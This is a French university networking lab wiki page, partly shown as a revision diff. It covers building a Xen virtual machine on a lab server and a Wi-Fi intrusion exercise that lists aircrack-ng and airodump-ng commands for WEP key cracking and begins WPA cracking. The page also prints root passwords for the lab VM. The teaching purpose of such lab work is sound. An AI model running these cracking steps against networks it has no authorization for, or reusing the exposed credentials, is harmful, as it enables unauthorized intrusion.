TP sysres IMA2a5 2020/2021 G1 : Différence entre versions
Ligne 108 : | Ligne 108 : | ||
airmon-ng | airmon-ng | ||
+ | |||
PHY Interface Driver Chipset | PHY Interface Driver Chipset | ||
phy3 wlx40a5ef0590b2 rt2800usb Ralink Technology, Corp. RT5370 | phy3 wlx40a5ef0590b2 rt2800usb Ralink Technology, Corp. RT5370 | ||
airmon-ng start wlx40a5ef0590b2 | airmon-ng start wlx40a5ef0590b2 | ||
+ | |||
PHY Interface Driver Chipset | PHY Interface Driver Chipset | ||
phy3 wlan0mon rt2800usb Ralink Technology, Corp. RT5370 | phy3 wlan0mon rt2800usb Ralink Technology, Corp. RT5370 | ||
Ligne 136 : | Ligne 138 : | ||
===Cassage WPA=== | ===Cassage WPA=== | ||
− | + | On procède de la même manière que pour le cassage WEP: | |
airmon-ng | airmon-ng | ||
+ | |||
PHY Interface Driver Chipset | PHY Interface Driver Chipset | ||
phy3 wlx40a5ef0590b2 rt2800usb Ralink Technology, Corp. RT5370 | phy3 wlx40a5ef0590b2 rt2800usb Ralink Technology, Corp. RT5370 | ||
airmon-ng start wlx40a5ef0590b2 | airmon-ng start wlx40a5ef0590b2 | ||
+ | |||
PHY Interface Driver Chipset | PHY Interface Driver Chipset | ||
phy3 wlan0mon rt2800usb Ralink Technology, Corp. RT5370 | phy3 wlan0mon rt2800usb Ralink Technology, Corp. RT5370 |
Version du 4 novembre 2020 à 14:57
Login: root & password: glopglopglop
Sommaire
Présentation du projet
Partie Hardware
Nécessité de changer le rack. Nous avons eu la chance d'avoir à notre disposition du matériel récent que la classe s'est empressée d'installer. Les cartes et alimentations enfichées dans le rack initialement contenu dans la baie ont été retirées une à une afin de l'alléger. Ensuite le rack (non E) a été retiré. Puis le nouveau rack (E) a été mis dans la baie. Les points de fixations ont du être adaptés. Suivi par "l’en-fichage" des alimentations ainsi que des nouvelles cartes, correspondant au nouveau rack.
Serveur & Disques
Lors de la première séance de TP, nous avons voulu rajouter des nouveaux disques sur le serveur capbreton. Pour cela, nous avons extrait un disque d'un autre serveur, ainsi qu'un disque présent sur le serveur capbreton afin de les comparer: berceau identique, taille du disque, emplacement de la connectique.
Machine virtuelle: Installation et Configuration
Connexion au serveur
Dans le cadre de notre TP, nous avons du créer nos machines virtuelles sur le serveur capbreton.
ssh capbreton.plil.info
Création de la Machine Virtuelle
Grace à la commande ci-dessous, on définit:
- Le nom de la machine: rafale
- Son adresse IP: 193.48.57.164
xen-create-image --hostname rafale --ip 193.48.57.164 --gateway 193.48.57.163 --dir /usr/local/xen --dist beowulf
Dans un autre terminal, on peut utiliser la commande suivante afin d'afficher l'avancement de l'installation de la machine.
tail -f /var/log/xen-tools/rafale.cfg
Configuration de la Machine Virtuelle
vi /etc/xen/rafale.cfg
Dans le fichier obtenu, dans la catégorie Networking, il a fallu rajouter le bridge de notre groupe, à savoir IMA2a5.
# # Configuration file for the Xen instance rafale, created # by xen-tools 4.8 on Fri Sep 25 10:23:30 2020. # # # Kernel + memory size # kernel = '/boot/vmlinuz-4.19.0-9-amd64' extra = 'elevator=noop' ramdisk = '/boot/initrd.img-4.19.0-9-amd64' vcpus = '1' memory = '256' # # Disk device(s). # root = '/dev/xvda2 ro' disk = [ 'file:/usr/local/xen/domains/rafale/disk.img,xvda2,w', 'file:/usr/local/xen/domains/rafale/swap.img,xvda1,w', ] # # Physical volumes # # # Hostname # name = 'rafale' # # Networking # dhcp = 'dhcp' vif = [ 'mac=00:16:3E:92:0E:6D, bridge=IMA2a5' ] # # Behaviour # on_poweroff = 'destroy' on_reboot = 'restart' on_crash = 'restart'
Démarrage de la Machine Virtuelle
xen create /etc/xen/rafale.cfg xen console rafale
Le terminal demande ensuite un login et un mot de passe. Le login par défaut est root et le mot de passe est compliqué. Il apparaît tout en bas de la commande tail tapée dans un deuxième terminal, ou on peut le récupérer grâce à la commande (dans un terminal connecté sur capbreton):
cat /var/log/xen-tools/rafale.log | grep Password Root Password : jSWVeqxbg58uvrkfByMxvjJ
Cette dernière commande permet de tout simplement afficher la ligne contenant le mot de passe contenue dans le fichier log. On modifie ensuite ce mot de passe en tapant (sur la VM):
passwd
Le mot de passe est maintenant glopglopglop.
Configuration SSH
Configuration DNS
Tests d'intrusion
Cassage WEP
apt-get install aircrack-ng
airmon-ng PHY Interface Driver Chipset phy3 wlx40a5ef0590b2 rt2800usb Ralink Technology, Corp. RT5370
airmon-ng start wlx40a5ef0590b2 PHY Interface Driver Chipset phy3 wlan0mon rt2800usb Ralink Technology, Corp. RT5370
airodump-ng --encrypt wep -c 2 wlan0mon
ip link set wlan0mon up
dmseg
apt install firmware-linux-nonfree
airodump-ng --encrypt wep wlan0mon
airodump-ng --encrypt wep -c 9 wlan0mon
04:DA:D2:9C:50:50
airodump-ng -c 9 --bssid 04:DA:D2:9C:50:50 wlan0mon
airodump-ng -c 9 --bssid 04:DA:D2:9C:50:50 -w data.txt wlan0mon
Dans un autre terminal:
aircrack-ng -b 04:DA:D2:9C:50:50 data*.cap
Cassage WPA
On procède de la même manière que pour le cassage WEP:
airmon-ng PHY Interface Driver Chipset phy3 wlx40a5ef0590b2 rt2800usb Ralink Technology, Corp. RT5370
airmon-ng start wlx40a5ef0590b2 PHY Interface Driver Chipset phy3 wlan0mon rt2800usb Ralink Technology, Corp. RT5370
Sur capbreton:
lvcreate -L10G -n rafale-home virtual lvcreate -L10G -n rafale-var virtual
mke2fs /dev/virtual/rafale-home mke2fs /dev/virtual/rafale-var